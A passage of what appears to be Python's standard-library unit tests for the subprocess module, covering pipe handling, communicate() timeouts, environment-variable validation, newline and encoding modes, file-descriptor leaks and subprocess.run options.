p = subprocess.Popen([sys.executable, "-c",
'for i in range(10240):'
'print("x" * 1024)'],
stdout=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdout, None)
def test_stderr_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys\n'
'for i in range(10240):'
'sys.stderr.write("x" * 1024)'],
stderr=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stderr, None)
def test_stdin_devnull(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.stdin.read(1)'],
stdin=subprocess.DEVNULL)
p.wait()
self.assertEqual(p.stdin, None)
def test_env(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "orange"
with subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange")
# Windows requires at least the SYSTEMROOT environment variable to start
# Python
@unittest.skipIf(sys.platform == 'win32',
'cannot test an empty env on Windows')
@unittest.skipIf(sysconfig.get_config_var('Py_ENABLE_SHARED') == 1,
'The Python shared library cannot be loaded '
'with an empty environment.')
def test_empty_env(self):
"""Verify that env={} is as empty as possible."""
def is_env_var_to_ignore(n):
"""Determine if an environment variable is under our control."""
# This excludes some __CF_* and VERSIONER_* keys MacOS insists
# on adding even when the environment in exec is empty.
# Gentoo sandboxes also force LD_PRELOAD and SANDBOX_* to exist.
return ('VERSIONER' in n or '__CF' in n or # MacOS
n == 'LD_PRELOAD' or n.startswith('SANDBOX') or # Gentoo
n == 'LC_CTYPE') # Locale coercion triggered
with subprocess.Popen([sys.executable, "-c",
'import os; print(list(os.environ.keys()))'],
stdout=subprocess.PIPE, env={}) as p:
stdout, stderr = p.communicate()
child_env_names = eval(stdout.strip())
self.assertIsInstance(child_env_names, list)
child_env_names = [k for k in child_env_names
if not is_env_var_to_ignore(k)]
self.assertEqual(child_env_names, [])
def test_invalid_cmd(self):
# null character in the command name
cmd = sys.executable + '\0'
with self.assertRaises(ValueError):
subprocess.Popen([cmd, "-c", "pass"])
# null character in the command argument
with self.assertRaises(ValueError):
subprocess.Popen([sys.executable, "-c", "pass#\0"])
def test_invalid_env(self):
# null character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT\0VEGETABLE"] = "cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# null character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange\0VEGETABLE=cabbage"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable name
newenv = os.environ.copy()
newenv["FRUIT=ORANGE"] = "lemon"
with self.assertRaises(ValueError):
subprocess.Popen(ZERO_RETURN_CMD, env=newenv)
# equal character in the environment variable value
newenv = os.environ.copy()
newenv["FRUIT"] = "orange=lemon"
with subprocess.Popen([sys.executable, "-c",
'import sys, os;'
'sys.stdout.write(os.getenv("FRUIT"))'],
stdout=subprocess.PIPE,
env=newenv) as p:
stdout, stderr = p.communicate()
self.assertEqual(stdout, b"orange=lemon")
def test_communicate_stdin(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys;'
'sys.exit(sys.stdin.read() == "pear")'],
stdin=subprocess.PIPE)
p.communicate(b"pear")
self.assertEqual(p.returncode, 1)
def test_communicate_stdout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stdout.write("pineapple")'],
stdout=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, b"pineapple")
self.assertEqual(stderr, None)
def test_communicate_stderr(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys; sys.stderr.write("pineapple")'],
stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, b"pineapple")
def test_communicate(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stderr.write("pineapple");'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
(stdout, stderr) = p.communicate(b"banana")
self.assertEqual(stdout, b"banana")
self.assertEqual(stderr, b"pineapple")
def test_communicate_timeout(self):
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stderr.write("pineapple\\n");'
'time.sleep(1);'
'sys.stderr.write("pear\\n");'
'sys.stdout.write(sys.stdin.read())'],
universal_newlines=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, "banana",
timeout=0.3)
# Make sure we can keep waiting for it, and that we get the whole output
# after it completes.
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, "banana")
self.assertEqual(stderr.encode(), b"pineapple\npear\n")
def test_communicate_timeout_large_output(self):
# Test an expiring timeout while the child is outputting lots of data.
p = subprocess.Popen([sys.executable, "-c",
'import sys,os,time;'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'
'time.sleep(0.2);'
'sys.stdout.write("a" * (64 * 1024));'],
stdout=subprocess.PIPE)
self.assertRaises(subprocess.TimeoutExpired, p.communicate, timeout=0.4)
(stdout, _) = p.communicate()
self.assertEqual(len(stdout), 4 * 64 * 1024)
# Test for the fd leak reported in http://bugs.python.org/issue2791.
def test_communicate_pipe_fd_leak(self):
for stdin_pipe in (False, True):
for stdout_pipe in (False, True):
for stderr_pipe in (False, True):
options = {}
if stdin_pipe:
options['stdin'] = subprocess.PIPE
if stdout_pipe:
options['stdout'] = subprocess.PIPE
if stderr_pipe:
options['stderr'] = subprocess.PIPE
if not options:
continue
p = subprocess.Popen(ZERO_RETURN_CMD, **options)
p.communicate()
if p.stdin is not None:
self.assertTrue(p.stdin.closed)
if p.stdout is not None:
self.assertTrue(p.stdout.closed)
if p.stderr is not None:
self.assertTrue(p.stderr.closed)
def test_communicate_returns(self):
# communicate() should return None if no redirection is active
p = subprocess.Popen([sys.executable, "-c",
"import sys; sys.exit(47)"])
(stdout, stderr) = p.communicate()
self.assertEqual(stdout, None)
self.assertEqual(stderr, None)
def test_communicate_pipe_buf(self):
# communicate() with writes larger than pipe_buf
# This test will probably deadlock rather than fail, if
# communicate() does not work properly.
x, y = os.pipe()
os.close(x)
os.close(y)
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read(47));'
'sys.stderr.write("x" * %d);'
'sys.stdout.write(sys.stdin.read())' %
support.PIPE_MAX_SIZE],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
string_to_write = b"a" * support.PIPE_MAX_SIZE
(stdout, stderr) = p.communicate(string_to_write)
self.assertEqual(stdout, string_to_write)
def test_writes_before_communicate(self):
# stdin.write before communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;'
'sys.stdout.write(sys.stdin.read())'],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.stdin.write(b"banana")
(stdout, stderr) = p.communicate(b"split")
self.assertEqual(stdout, b"bananasplit")
self.assertEqual(stderr, b"")
def test_universal_newlines_and_text(self):
args = [
sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(sys.stdin.readline().encode());'
'buf.flush();'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(sys.stdin.read().encode());'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");']
for extra_kwarg in ('universal_newlines', 'text'):
p = subprocess.Popen(args, **{'stdin': subprocess.PIPE,
'stdout': subprocess.PIPE,
extra_kwarg: True})
with p:
p.stdin.write("line1\n")
p.stdin.flush()
self.assertEqual(p.stdout.readline(), "line1\n")
p.stdin.write("line3\n")
p.stdin.close()
self.addCleanup(p.stdout.close)
self.assertEqual(p.stdout.readline(),
"line2\n")
self.assertEqual(p.stdout.read(6),
"line3\n")
self.assertEqual(p.stdout.read(),
"line4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate(self):
# universal newlines through communicate()
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY +
'buf = sys.stdout.buffer;'
'buf.write(b"line2\\n");'
'buf.flush();'
'buf.write(b"line4\\n");'
'buf.flush();'
'buf.write(b"line5\\r\\n");'
'buf.flush();'
'buf.write(b"line6\\r");'
'buf.flush();'
'buf.write(b"\\nline7");'
'buf.flush();'
'buf.write(b"\\nline8");'],
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=1)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate()
self.assertEqual(stdout,
"line2\nline4\nline5\nline6\nline7\nline8")
def test_universal_newlines_communicate_stdin(self):
# universal newlines through communicate(), with only stdin
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.readline()
assert s == "line1\\n", repr(s)
s = sys.stdin.read()
assert s == "line3\\n", repr(s)
''')],
stdin=subprocess.PIPE,
universal_newlines=1)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_input_none(self):
# Test communicate(input=None) with universal newlines.
#
# We set stdout to PIPE because, as of this writing, a different
# code path is tested when the number of pipes is zero or one.
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
p.communicate()
self.assertEqual(p.returncode, 0)
def test_universal_newlines_communicate_stdin_stdout_stderr(self):
# universal newlines through communicate(), with stdin, stdout, stderr
p = subprocess.Popen([sys.executable, "-c",
'import sys,os;' + SETBINARY + textwrap.dedent('''
s = sys.stdin.buffer.readline()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line2\\r")
sys.stderr.buffer.write(b"eline2\\n")
s = sys.stdin.buffer.read()
sys.stdout.buffer.write(s)
sys.stdout.buffer.write(b"line4\\n")
sys.stdout.buffer.write(b"line5\\r\\n")
sys.stderr.buffer.write(b"eline6\\r")
sys.stderr.buffer.write(b"eline7\\r\\nz")
''')],
stdin=subprocess.PIPE,
stderr=subprocess.PIPE,
stdout=subprocess.PIPE,
universal_newlines=True)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
(stdout, stderr) = p.communicate("line1\nline3\n")
self.assertEqual(p.returncode, 0)
self.assertEqual("line1\nline2\nline3\nline4\nline5\n", stdout)
# Python debug build push something like "[42442 refs]\n"
# to stderr at exit of subprocess.
self.assertTrue(stderr.startswith("eline2\neline6\neline7\n"))
def test_universal_newlines_communicate_encodings(self):
# Check that universal newlines mode works for various encodings,
# in particular for encodings in the UTF-16 and UTF-32 families.
# See issue #15595.
#
# UTF-16 and UTF-32-BE are sufficient to check both with BOM and
# without, and UTF-16 and UTF-32.
for encoding in ['utf-16', 'utf-32-be']:
code = ("import sys; "
r"sys.stdout.buffer.write('1\r\n2\r3\n4'.encode('%s'))" %
encoding)
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding=encoding)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '1\n2\n3\n4')
def test_communicate_errors(self):
for errors, expected in [
('ignore', ''),
('replace', '\ufffd\ufffd'),
('surrogateescape', '\udc80\udc80'),
('backslashreplace', '\\x80\\x80'),
]:
code = ("import sys; "
r"sys.stdout.buffer.write(b'[\x80\x80]')")
args = [sys.executable, '-c', code]
# We set stdin to be non-None because, as of this writing,
# a different code path is used when the number of pipes is
# zero or one.
popen = subprocess.Popen(args,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
encoding='utf-8',
errors=errors)
stdout, stderr = popen.communicate(input='')
self.assertEqual(stdout, '[{}]'.format(expected))
def test_no_leaking(self):
# Make sure we leak no resources
if not mswindows:
max_handles = 1026 # too much for most UNIX systems
else:
max_handles = 2050 # too much for (at least some) Windows setups
handles = []
tmpdir = tempfile.mkdtemp()
try:
for i in range(max_handles):
try:
tmpfile = os.path.join(tmpdir, support.TESTFN)
handles.append(os.open(tmpfile, os.O_WRONLY|os.O_CREAT))
except OSError as e:
if e.errno != errno.EMFILE:
raise
break
else:
self.skipTest("failed to reach the file descriptor limit "
"(tried %d)" % max_handles)
# Close a couple of them (should be enough for a subprocess)
for i in range(10):
os.close(handles.pop())
# Loop creating some subprocesses. If one of them leaks some fds,
# the next loop iteration will fail by reaching the max fd limit.
for i in range(15):
p = subprocess.Popen([sys.executable, "-c",
"import sys;"
"sys.stdout.write(sys.stdin.read())"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
data = p.communicate(b"lime")[0]
self.assertEqual(data, b"lime")
finally:
for h in handles:
os.close(h)
shutil.rmtree(tmpdir)
def test_list2cmdline(self):
self.assertEqual(subprocess.list2cmdline(['a b c', 'd', 'e']),
'"a b c" d e')
self.assertEqual(subprocess.list2cmdline(['ab"c', '\\', 'd']),
'ab\\"c \\ d')
self.assertEqual(subprocess.list2cmdline(['ab"c', ' \\', 'd']),
'ab\\"c " \\\\" d')
self.assertEqual(subprocess.list2cmdline(['a\\\\\\b', 'de fg', 'h']),
'a\\\\\\b "de fg" h')
self.assertEqual(subprocess.list2cmdline(['a\\"b', 'c', 'd']),
'a\\\\\\"b c d')
self.assertEqual(subprocess.list2cmdline(['a\\\\b c', 'd', 'e']),
'"a\\\\b c" d e')
self.assertEqual(subprocess.list2cmdline(['a\\\\b\\ c', 'd', 'e']),
'"a\\\\b\\ c" d e')
self.assertEqual(subprocess.list2cmdline(['ab', '']),
'ab ""')
def test_poll(self):
p = subprocess.Popen([sys.executable, "-c",
"import os; os.read(0, 1)"],
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
self.assertIsNone(p.poll())
os.write(p.stdin.fileno(), b'A')
p.wait()
# Subsequent invocations should just return the returncode
self.assertEqual(p.poll(), 0)
def test_wait(self):
p = subprocess.Popen(ZERO_RETURN_CMD)
self.assertEqual(p.wait(), 0)
# Subsequent invocations should just return the returncode
self.assertEqual(p.wait(), 0)
def test_wait_timeout(self):
p = subprocess.Popen([sys.executable,
"-c", "import time; time.sleep(0.3)"])
with self.assertRaises(subprocess.TimeoutExpired) as c:
p.wait(timeout=0.0001)
self.assertIn("0.0001", str(c.exception)) # For coverage of __str__.
self.assertEqual(p.wait(timeout=support.SHORT_TIMEOUT), 0)
def test_invalid_bufsize(self):
# an invalid type of the bufsize argument should raise
# TypeError.
with self.assertRaises(TypeError):
subprocess.Popen(ZERO_RETURN_CMD, "orange")
def test_bufsize_is_none(self):
# bufsize=None should be the same as bufsize=0.
p = subprocess.Popen(ZERO_RETURN_CMD, None)
self.assertEqual(p.wait(), 0)
# Again with keyword arg
p = subprocess.Popen(ZERO_RETURN_CMD, bufsize=None)
self.assertEqual(p.wait(), 0)
def _test_bufsize_equal_one(self, line, expected, universal_newlines):
# subprocess may deadlock with bufsize=1, see issue #21332
with subprocess.Popen([sys.executable, "-c", "import sys;"
"sys.stdout.write(sys.stdin.readline());"
"sys.stdout.flush()"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL,
bufsize=1,
universal_newlines=universal_newlines) as p:
p.stdin.write(line) # expect that it flushes the line in text mode
os.close(p.stdin.fileno()) # close it without flushing the buffer
read_line = p.stdout.readline()
with support.SuppressCrashReport():
try:
p.stdin.close()
except OSError:
pass
p.stdin = None
self.assertEqual(p.returncode, 0)
self.assertEqual(read_line, expected)
def test_bufsize_equal_one_text_mode(self):
# line is flushed in text mode with bufsize=1.
# we should get the full line in return
line = "line\n"
self._test_bufsize_equal_one(line, line, universal_newlines=True)
def test_bufsize_equal_one_binary_mode(self):
# line is not flushed in binary mode with bufsize=1.
# we should get empty response
line = b'line' + os.linesep.encode() # assume ascii-based locale
with self.assertWarnsRegex(RuntimeWarning, 'line buffering'):
self._test_bufsize_equal_one(line, b'', universal_newlines=False)
def test_leaking_fds_on_error(self):
# see bug #5179: Popen leaks file descriptors to PIPEs if
# the child fails to execute; this will eventually exhaust
# the maximum number of open fds. 1024 seems a very common
# value for that limit, but Windows has 2048, so we loop
# 1024 times (each call leaked two fds).
for i in range(1024):
with self.assertRaises(NONEXISTING_ERRORS):
subprocess.Popen(NONEXISTING_CMD,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
def test_nonexisting_with_pipes(self):
# bpo-30121: Popen with pipes must close properly pipes on error.
# Previously, os.close() was called with a Windows handle which is not
# a valid file descriptor.
#
# Run the test in a subprocess to control how the CRT reports errors
# and to get stderr content.
try:
import msvcrt
msvcrt.CrtSetReportMode
except (AttributeError, ImportError):
self.skipTest("need msvcrt.CrtSetReportMode")
code = textwrap.dedent(f"""
import msvcrt
import subprocess
cmd = {NONEXISTING_CMD!r}
for report_type in [msvcrt.CRT_WARN,
msvcrt.CRT_ERROR,
msvcrt.CRT_ASSERT]:
msvcrt.CrtSetReportMode(report_type, msvcrt.CRTDBG_MODE_FILE)
msvcrt.CrtSetReportFile(report_type, msvcrt.CRTDBG_FILE_STDERR)
try:
subprocess.Popen(cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except OSError:
pass
""")
cmd = [sys.executable, "-c", code]
proc = subprocess.Popen(cmd,
stderr=subprocess.PIPE,
universal_newlines=True)
with proc:
stderr = proc.communicate()[1]
self.assertEqual(stderr, "")
self.assertEqual(proc.returncode, 0)
def test_double_close_on_error(self):
# Issue #18851
fds = []
def open_fds():
for i in range(20):
fds.extend(os.pipe())
time.sleep(0.001)
t = threading.Thread(target=open_fds)
t.start()
try:
with self.assertRaises(EnvironmentError):
subprocess.Popen(NONEXISTING_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
finally:
t.join()
exc = None
for fd in fds:
# If a double close occurred, some of those fds will
# already have been closed by mistake, and os.close()
# here will raise.
try:
os.close(fd)
except OSError as e:
exc = e
if exc is not None:
raise exc
def test_threadsafe_wait(self):
"""Issue21291: Popen.wait() needs to be threadsafe for returncode."""
proc = subprocess.Popen([sys.executable, '-c',
'import time; time.sleep(12)'])
self.assertEqual(proc.returncode, None)
results = []
def kill_proc_timer_thread():
results.append(('thread-start-poll-result', proc.poll()))
# terminate it from the thread and wait for the result.
proc.kill()
proc.wait()
results.append(('thread-after-kill-and-wait', proc.returncode))
# this wait should be a no-op given the above.
proc.wait()
results.append(('thread-after-second-wait', proc.returncode))
# This is a timing sensitive test, the failure mode is
# triggered when both the main thread and this thread are in
# the wait() call at once. The delay here is to allow the
# main thread to most likely be blocked in its wait() call.
t = threading.Timer(0.2, kill_proc_timer_thread)
t.start()
if mswindows:
expected_errorcode = 1
else:
# Should be -9 because of the proc.kill() from the thread.
expected_errorcode = -9
# Wait for the process to finish; the thread should kill it
# long before it finishes on its own. Supplying a timeout
# triggers a different code path for better coverage.
proc.wait(timeout=support.SHORT_TIMEOUT)
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in wait from main thread")
# This should be a no-op with no change in returncode.
proc.wait()
self.assertEqual(proc.returncode, expected_errorcode,
msg="unexpected result in second main wait.")
t.join()
# Ensure that all of the thread results are as expected.
# When a race condition occurs in wait(), the returncode could
# be set by the wrong thread that doesn't actually have it
# leading to an incorrect value.
self.assertEqual([('thread-start-poll-result', None),
('thread-after-kill-and-wait', expected_errorcode),
('thread-after-second-wait', expected_errorcode)],
results)
def test_issue8780(self):
# Ensure that stdout is inherited from the parent
# if stdout=PIPE is not used
code = ';'.join((
'import subprocess, sys',
'retcode = subprocess.call('
"[sys.executable, '-c', 'print(\"Hello World!\")'])",
'assert retcode == 0'))
output = subprocess.check_output([sys.executable, '-c', code])
self.assertTrue(output.startswith(b'Hello World!'), ascii(output))
def test_handles_closed_on_exception(self):
# If CreateProcess exits with an error, ensure the
# duplicate output handles are released
ifhandle, ifname = tempfile.mkstemp()
ofhandle, ofname = tempfile.mkstemp()
efhandle, efname = tempfile.mkstemp()
try:
subprocess.Popen (["*"], stdin=ifhandle, stdout=ofhandle,
stderr=efhandle)
except OSError:
os.close(ifhandle)
os.remove(ifname)
os.close(ofhandle)
os.remove(ofname)
os.close(efhandle)
os.remove(efname)
self.assertFalse(os.path.exists(ifname))
self.assertFalse(os.path.exists(ofname))
self.assertFalse(os.path.exists(efname))
def test_communicate_epipe(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.addCleanup(p.stdout.close)
self.addCleanup(p.stderr.close)
self.addCleanup(p.stdin.close)
p.communicate(b"x" * 2**20)
def test_repr(self):
# Run a command that waits for user input, to check the repr() of
# a Proc object while and after the sub-process runs.
code = 'import sys; input(); sys.exit(57)'
cmd = [sys.executable, '-c', code]
result = "<Popen: returncode: {}"
with subprocess.Popen(
cmd, stdin=subprocess.PIPE, universal_newlines=True) as proc:
self.assertIsNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
proc.communicate(input='exit...\n')
proc.wait()
self.assertIsNotNone(proc.returncode)
self.assertTrue(
repr(proc).startswith(result.format(proc.returncode)) and
repr(proc).endswith('>')
)
def test_communicate_epipe_only_stdin(self):
# Issue 10963: communicate() should hide EPIPE
p = subprocess.Popen(ZERO_RETURN_CMD,
stdin=subprocess.PIPE)
self.addCleanup(p.stdin.close)
p.wait()
p.communicate(b"x" * 2**20)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
"Requires signal.SIGUSR1")
@unittest.skipUnless(hasattr(os, 'kill'),
"Requires os.kill")
@unittest.skipUnless(hasattr(os, 'getppid'),
"Requires os.getppid")
def test_communicate_eintr(self):
# Issue #12493: communicate() should handle EINTR
def handler(signum, frame):
pass
old_handler = signal.signal(signal.SIGUSR1, handler)
self.addCleanup(signal.signal, signal.SIGUSR1, old_handler)
args = [sys.executable, "-c",
'import os, signal;'
'os.kill(os.getppid(), signal.SIGUSR1)']
for stream in ('stdout', 'stderr'):
kw = {stream: subprocess.PIPE}
with subprocess.Popen(args, **kw) as process:
# communicate() will be interrupted by SIGUSR1
process.communicate()
# This test is Linux-ish specific for simplicity to at least have
# some coverage. It is not a platform specific bug.
@unittest.skipUnless(os.path.isdir('/proc/%d/fd' % os.getpid()),
"Linux specific")
def test_failed_child_execute_fd_leak(self):
"""Test for the fork() failure fd leak reported in issue16327."""
fd_directory = '/proc/%d/fd' % os.getpid()
fds_before_popen = os.listdir(fd_directory)
with self.assertRaises(PopenTestException):
PopenExecuteChildRaises(
ZERO_RETURN_CMD, stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# NOTE: This test doesn't verify that the real _execute_child
# does not close the file descriptors itself on the way out
# during an exception. Code inspection has confirmed that.
fds_after_exception = os.listdir(fd_directory)
self.assertEqual(fds_before_popen, fds_after_exception)
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_includes_filename(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.call(['/opt/nonexistent_binary', 'with', 'some', 'args'])
self.assertEqual(c.exception.filename, '/opt/nonexistent_binary')
@unittest.skipIf(mswindows, "behavior currently not supported on Windows")
def test_file_not_found_with_bad_cwd(self):
with self.assertRaises(FileNotFoundError) as c:
subprocess.Popen(['exit', '0'], cwd='/some/nonexistent/directory')
self.assertEqual(c.exception.filename, '/some/nonexistent/directory')
def test_class_getitems(self):
self.assertIsInstance(subprocess.Popen[bytes], types.GenericAlias)
self.assertIsInstance(subprocess.CompletedProcess[str], types.GenericAlias)
class RunFuncTestCase(BaseTestCase):
def run_python(self, code, **kwargs):
"""Run Python code in a subprocess using subprocess.run"""
argv = [sys.executable, "-c", code]
return subprocess.run(argv, **kwargs)
def test_returncode(self):
# call() function with sequence argument
cp = self.run_python("import sys; sys.exit(47)")
self.assertEqual(cp.returncode, 47)
with self.assertRaises(subprocess.CalledProcessError):
cp.check_returncode()
def test_check(self):
with self.assertRaises(subprocess.CalledProcessError) as c:
self.run_python("import sys; sys.exit(47)", check=True)
self.assertEqual(c.exception.returncode, 47)
def test_check_zero(self):
# check_returncode shouldn't raise when returncode is zero
cp = subprocess.run(ZERO_RETURN_CMD, check=True)
self.assertEqual(cp.returncode, 0)
def test_timeout(self):
# run() function with timeout argument; we want to test that the child
# process gets killed when the timeout expires. If the child isn't
# killed, this call will deadlock since subprocess.run waits for the
# child.
with self.assertRaises(subprocess.TimeoutExpired):
self.run_python("while True: pass", timeout=0.0001)
def test_capture_stdout(self):
# capture stdout with zero return code
cp = self.run_python("print('BDFL')", stdout=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stdout)
def test_capture_stderr(self):
cp = self.run_python("import sys; sys.stderr.write('BDFL')",
stderr=subprocess.PIPE)
self.assertIn(b'BDFL', cp.stderr)
def test_check_output_stdin_arg(self):
# run() can be called with stdin set to a file
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
stdin=tf, stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_input_arg(self):
# check_output() can be called with input set to a string
cp = self.run_python(
"import sys; sys.stdout.write(sys.stdin.read().upper())",
input=b'pear', stdout=subprocess.PIPE)
self.assertIn(b'PEAR', cp.stdout)
def test_check_output_stdin_with_input_arg(self):
# run() refuses to accept 'stdin' with 'input'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
tf.write(b'pear')
tf.seek(0)
with self.assertRaises(ValueError,
msg="Expected ValueError when stdin and input args supplied.") as c:
output = self.run_python("print('will not be run')",
stdin=tf, input=b'hare')
self.assertIn('stdin', c.exception.args[0])
self.assertIn('input', c.exception.args[0])
def test_check_output_timeout(self):
with self.assertRaises(subprocess.TimeoutExpired) as c:
cp = self.run_python((
"import sys, time\n"
"sys.stdout.write('BDFL')\n"
"sys.stdout.flush()\n"
"time.sleep(3600)"),
# Some heavily loaded buildbots (sparc Debian 3.x) require
# this much time to start and print.
timeout=3, stdout=subprocess.PIPE)
self.assertEqual(c.exception.output, b'BDFL')
# output is aliased to stdout
self.assertEqual(c.exception.stdout, b'BDFL')
def test_run_kwargs(self):
newenv = os.environ.copy()
newenv["FRUIT"] = "banana"
cp = self.run_python(('import sys, os;'
'sys.exit(33 if os.getenv("FRUIT")=="banana" else 31)'),
env=newenv)
self.assertEqual(cp.returncode, 33)
def test_run_with_pathlike_path(self):
# bpo-31961: test run(pathlike_object)
# the name of a command that can be run without
# any arguments that exit fast
prog = 'tree.com' if mswindows else 'ls'
path = shutil.which(prog)
if path is None:
self.skipTest(f'{prog} required for this test')
path = FakePath(path)
res = subprocess.run(path, stdout=subprocess.DEVNULL)
self.assertEqual(res.returncode, 0)
with self.assertRaises(TypeError):
subprocess.run(path, stdout=subprocess.DEVNULL, shell=True)
def test_run_with_bytes_path_and_arguments(self):
# bpo-31961: test run([bytes_object, b'additional arguments'])
path = os.fsencode(sys.executable)
args = [path, '-c', b'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_run_with_pathlike_path_and_arguments(self):
# bpo-31961: test run([pathlike_object, 'additional arguments'])
path = FakePath(sys.executable)
args = [path, '-c', 'import sys; sys.exit(57)']
res = subprocess.run(args)
self.assertEqual(res.returncode, 57)
def test_capture_output(self):
cp = self.run_python(("import sys;"
"sys.stdout.write('BDFL'); "
"sys.stderr.write('FLUFL')"),
capture_output=True)
self.assertIn(b'BDFL', cp.stdout)
self.assertIn(b'FLUFL', cp.stderr)
def test_stdout_with_capture_output_arg(self):
# run() refuses to accept 'stdout' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stdout and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stdout=tf)
self.assertIn('stdout', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
def test_stderr_with_capture_output_arg(self):
# run() refuses to accept 'stderr' with 'capture_output'
tf = tempfile.TemporaryFile()
self.addCleanup(tf.close)
with self.assertRaises(ValueError,
msg=("Expected ValueError when stderr and capture_output "
"args supplied.")) as c:
output = self.run_python("print('will not be run')",
capture_output=True, stderr=tf)
self.assertIn('stderr', c.exception.args[0])
self.assertIn('capture_output', c.exception.args[0])
# This test _might_ wind up a bit fragile on loaded build+test machines
# as it depends on the timing with wide enough margins for normal situations
# but does assert that it happened "soon enough" to believe the right thing
# happened.
@unittest.skipIf(mswindows, "requires posix like 'sleep' shell command")
def test_run_with_shell_timeout_and_capture_output(self):
"""Output capturing after a timeout mustn't hang forever on open filehandles."""
before_secs = time.monotonic()
try:
subprocess.run('sleep 3', shell=True, timeout=0.1,
capture_output=True) # New session unspecified.
except subprocess.TimeoutExpired as exc:
